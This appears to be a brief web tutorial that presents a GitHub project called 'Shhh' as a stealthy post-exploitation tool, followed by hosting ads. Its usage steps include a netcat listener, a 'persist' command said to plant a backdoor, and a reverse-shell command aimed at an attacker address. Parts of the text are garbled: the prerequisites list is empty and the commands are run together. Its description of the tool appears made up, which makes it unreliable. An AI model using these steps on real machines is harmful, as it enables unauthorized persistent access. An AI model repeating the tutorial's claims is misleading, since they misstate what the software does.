In this tutorial, we will learn how to install Shhh on Kali Linux. Shhh is a post-exploitation tool designed to maintain access to Linux machines. It provides a stealthy way of concealing backdoors and maintaining access to compromised machines.
Before we begin, make sure you have the following:
Follow the below steps to install Shhh on Kali Linux:
git clone https://github.com/smallwat3r/shhh.git
cd shhh
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
python3 shhh.py
This will display the help page of the tool.
Now, let's see how to use Shhh on Kali Linux.
nc -lvp 4444
python3 shhh.py
persist
command.shhh> persist
This will create a backdoor and maintain access for future sessions.
shhh> reverse_tcp_shell 192.168.1.10 4444
This will send a reverse shell to the attacker's machine on IP address 192.168.1.10
and port number 4444
.
In this tutorial, we learned how to install Shhh on Kali Linux and use it to maintain access to Linux machines. Remember to use this tool responsibly and only on machines you have permission to access.
If you want to self-host in an easy, hands free way, need an external IP address, or simply want your data in your own hands, give IPv6.rs a try!
Alternatively, for the best virtual desktop, try Shells!